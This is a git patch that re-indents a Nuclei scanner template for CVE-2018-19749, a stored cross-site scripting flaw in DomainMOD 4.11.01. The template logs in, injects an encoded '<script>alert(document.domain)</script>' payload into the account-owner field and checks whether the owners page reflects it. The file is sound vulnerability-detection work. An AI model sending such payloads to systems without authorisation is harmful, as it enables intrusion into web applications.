From 519767dc9c17143d87d9763c4cc7cb6c2526ab06 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Thu, 14 Jul 2022 15:33:59 +0530
Subject: [PATCH] Update CVE-2018-19749.yaml

---
 cves/2018/CVE-2018-19749.yaml | 82 +++++++++++++++++------------------
 1 file changed, 41 insertions(+), 41 deletions(-)

diff --git a/cves/2018/CVE-2018-19749.yaml b/cves/2018/CVE-2018-19749.yaml
index 996e7e8ab8..eb9c44a2d7 100644
--- a/cves/2018/CVE-2018-19749.yaml
+++ b/cves/2018/CVE-2018-19749.yaml
@@ -1,53 +1,53 @@
 id: CVE-2018-19749
 
 info:
-  name: DomainMOD 4.11.01 - Cross-Site Scripting
-  author: arafatansari
-  severity: medium
-  description: |
-    DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/account-owner.php Owner name field.
-  reference:
-    - https://www.exploit-db.com/exploits/45941/
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-19749
-  metadata:
-    verified: true
-  tags: cve,cve2018,domainmod,xss,authenticated
+   name: DomainMOD 4.11.01 - Cross-Site Scripting
+   author: arafatansari
+   severity: medium
+   description: |
+     DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/account-owner.php Owner name field.
+   reference:
+     - https://www.exploit-db.com/exploits/45941/
+     - https://nvd.nist.gov/vuln/detail/CVE-2018-19749
+   metadata:
+     verified: true
+   tags: cve,cve2018,domainmod,xss,authenticated
 
 requests:
-  - raw:
-      - |
-        POST / HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
+   - raw:
+       - |
+         POST / HTTP/1.1
+         Host: {{Hostname}}
+         Content-Type: application/x-www-form-urlencoded
 
-        new_username={{username}}&new_password={{password}}
+         new_username={{username}}&new_password={{password}}
 
-      - |
-        POST /assets/add/account-owner.php HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
+       - |
+         POST /assets/add/account-owner.php HTTP/1.1
+         Host: {{Hostname}}
+         Content-Type: application/x-www-form-urlencoded
 
-        new_owner=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=
+         new_owner=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=
 
-      - |
-        GET /assets/account-owners.php HTTP/1.1
-        Host: {{Hostname}}
+       - |
+         GET /assets/account-owners.php HTTP/1.1
+         Host: {{Hostname}}
 
-    cookie-reuse: true
-    redirects: true
-    max-redirects: 2
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '"><script>alert(document.domain)</script></a>'
+     cookie-reuse: true
+     redirects: true
+     max-redirects: 2
+     matchers-condition: and
+     matchers:
+       - type: word
+         part: body
+         words:
+           - '"><script>alert(document.domain)</script></a>'
 
-      - type: word
-        part: header
-        words:
-          - text/html
+       - type: word
+         part: header
+         words:
+           - text/html
 
-      - type: status
-        status:
-          - 200
+       - type: status
+         status:
+           - 200